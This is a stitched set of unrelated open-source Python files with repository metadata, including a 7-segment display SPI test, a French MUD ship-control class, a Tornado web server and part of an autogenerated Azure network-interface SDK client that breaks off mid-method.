# data[3] = num_to_pattern[now.year / 1 % 10]
# data[4] = num_to_pattern[now.month / 10 % 10]
# data[5] = num_to_pattern[now.month / 1 % 10]
# data[6] = num_to_pattern[now.day / 10 % 10]
# data[7] = num_to_pattern[now.day / 1 % 10]
data[0] = num_to_pattern[now.hour / 10 % 10]
data[1] = num_to_pattern[now.hour / 1 % 10]
if (now.microsecond < 500*1000):
data[1] |= 0x01;
data[2] = num_to_pattern[now.minute / 10 % 10]
data[3] = num_to_pattern[now.minute / 1 % 10]
if (now.microsecond < 500*1000):
data[3] |= 0x01;
data[4] = num_to_pattern[now.second / 10 % 10]
data[5] = num_to_pattern[now.second / 1 % 10]
if (now.microsecond < 500*1000):
data[5] |= 0x01;
data[6] = num_to_pattern[now.microsecond / 100000 % 10]
data[7] = num_to_pattern[now.microsecond / 10000 % 10]
# data[4] = num_to_pattern[now.microsecond / 1000 % 10]
# data[5] = num_to_pattern[now.microsecond / 100 % 10]
# data[6] = num_to_pattern[now.microsecond / 10 % 10]
# data[7] = num_to_pattern[now.microsecond / 1 % 10]
xfer_data.extend(data)
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
xfer_data = map(reverse_bit_order, xfer_data)
spi.writebytes(xfer_data)
|
extsui/7SegFinger
|
test_8digit.py
|
Python
|
mit
| 4,304 | 0.035431 |
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la méta-classe et la classe abstraite de contrôle."""
from abstraits.obase import BaseObj, MetaBaseObj
controles = {}
class MetaControle(MetaBaseObj):
"""Métaclasse des contrôles.
Elle ajoute le contrôle dans le dictionnaire 'controles' si il possède
une clé.
"""
def __init__(cls, nom, bases, contenu):
"""Constructeur de la métaclasse"""
MetaBaseObj.__init__(cls, nom, bases, contenu)
if cls.cle:
controles[cls.cle] = cls
class Controle(BaseObj, metaclass=MetaControle):
"""Classe représentant un contrôle.
Un contrôle est une classe intermédiaire entre un objectif et une
volonté. Un contrôle permet de spécifier une action continue
paramétrable. Par exemple, un contrôle permet de paramétrer la
vitesse du navire. Si un équipage possède ce contrôle actif,
le commandant (le capitaine ou second PNJ) va décomposer ce contrôle
en ordres après avoir déterminé combien de voiles, en fonction du
vent, doivent être hissées, ainsi que combien de rames doivent être
tenues et à quelle vitesse. Cependant, un contrôle n'est pas
simpelment une volonté enveloppant d'autres volontés : le contrôle
reste actif jusqu'au moment où il sera remplacé. Admettons que le
vent change de direction et que la vitesse se modifie, le contrôle
doit faire en sorte que la vitesse soit rétablie à celle spécifiée.
Contrairement aux objectifs, volontés et ordres, un contrôle est
actif ou inactif sur un navire en fonction de son type. On ne peut
avoir deux contrôles actifs en même temps sur le même navire
précisant que le navire doit aller à 1 noeud et à 2 noeuds. Par
contre, on peut avoir deux contrôles actifs sur le même navire, l'un
de type 'vitesse' précisant que le navire doit aller à 1,7 noeuds
et l'autre de type 'direction' précisant que le navire doit maintenir
ce cap.
"""
cle = None
logger = type(importeur).man_logs.get_logger("ordres")
def __init__(self, equipage, *args):
BaseObj.__init__(self)
self.equipage = equipage
self.arguments = args
def __getnewargs__(self):
arguments = (None, ) + tuple(getattr(self, "arguments", ()))
return arguments
def __repr__(self):
return "<Contrôle {}:{} {}>".format(self.cle_navire, self.cle,
self.arguments)
@property
def navire(self):
return self.equipage and self.equipage.navire or None
@property
def cle_navire(self):
navire = self.navire
return navire and navire.cle or "inconnu"
@property
def commandant(self):
"""Retourne le commdnant (PNJ) du navire."""
commandants = self.equipage.get_matelots_au_poste("commandant",
libre=False)
if commandants:
return commandants[0]
return None
def decomposer(self):
"""Décompose le contrôle en volontés.
C'est la méthode la plus importante et celle qui risque de contenir
le plus de code. Elle décompose réellement le contrôle en volontés
(plier 2 voiles, ramer lentement, par exemple).
"""
raise NotImplementedError
def debug(self, message):
"""Log le message précisé en paramètre en ajoutant des informations."""
message = "Contrôle {}:{}, {}".format(self.cle_navire, self.cle,
message)
self.logger.debug(message)
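# A minimal illustrative subclass (a sketch under assumptions: the key
# 'exemple' and its decomposition are hypothetical, not part of the game):
class ControleExemple(Controle):
    """Example control keeping one hypothetical setting constant."""
    cle = "exemple"
    def decomposer(self):
        # A real control would emit wills here (hoist sails, man oars, ...)
        # based on self.navire and self.arguments.
        self.debug("decomposing with arguments {}".format(self.arguments))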
|
vlegoff/tsunami
|
src/secondaires/navigation/equipage/controle.py
|
Python
|
bsd-3-clause
| 5,105 | 0.001191 |
# coding: utf-8
from deploy import app
if __name__ == '__main__':
    app.run(debug=True)
|
TL4/deploy
|
run.py
|
Python
|
mit
| 92 | 0.032609 |
import logging
import os
import sys
from tornado import ioloop
from tornado import web
from pyjobs import handlers
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger(__name__)
STATIC_PATH = os.path.join(os.path.dirname(__file__), 'static/')
url_patterns = [
web.url('/', handlers.HomeHandler, name='home'),
web.url('/ws', handlers.WebSocketHandler),
web.url('/static/(.*)', web.StaticFileHandler, {'path': STATIC_PATH}),
]
settings = {
'compiled_template_cache': False,
}
def server():
logger.info('Serving on port 8888')
application = web.Application(url_patterns, **settings)
application.listen(8888)
ioloop.IOLoop.current().start()
if __name__ == '__main__':
server()
|
winstonf88/pyjobs
|
pyjobs/app.py
|
Python
|
gpl-2.0
| 750 | 0.001333 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations:
"""NetworkInterfacesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
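    # Usage sketch (an assumption, not generated code): with an authenticated
    # NetworkManagementClient `client`, the delete LRO can be awaited as
    #
    #     poller = await client.network_interfaces.begin_delete("my-rg", "my-nic")
    #     await poller.result()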
async def get(
self,
resource_group_name: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Gets information about the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.NetworkInterface",
**kwargs: Any
) -> "_models.NetworkInterface":
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkInterface')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.NetworkInterface",
**kwargs: Any
) -> AsyncLROPoller["_models.NetworkInterface"]:
"""Creates or updates a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to the create or update network interface operation.
:type parameters: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_08_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
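    # Usage sketch (an assumption, not generated code):
    #
    #     poller = await client.network_interfaces.begin_create_or_update(
    #         "my-rg", "my-nic", nic_parameters)
    #     nic = await poller.result()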
async def update_tags(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.TagsObject",
**kwargs: Any
) -> "_models.NetworkInterface":
"""Updates a network interface tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to update network interface tags.
:type parameters: ~azure.mgmt.network.v2020_08_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_all(
self,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
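    # Usage sketch (an assumption): the returned AsyncItemPaged supports
    # `async for`, so all NICs in the subscription can be iterated as
    #
    #     async for nic in client.network_interfaces.list_all():
    #         print(nic.name)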
def list(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
async def _get_effective_route_table_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> Optional["_models.EffectiveRouteListResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.EffectiveRouteListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._get_effective_route_table_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
async def begin_get_effective_route_table(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.EffectiveRouteListResult"]:
"""Gets all route tables applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EffectiveRouteListResult or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_08_01.models.EffectiveRouteListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.EffectiveRouteListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._get_effective_route_table_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
async def _list_effective_network_security_groups_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
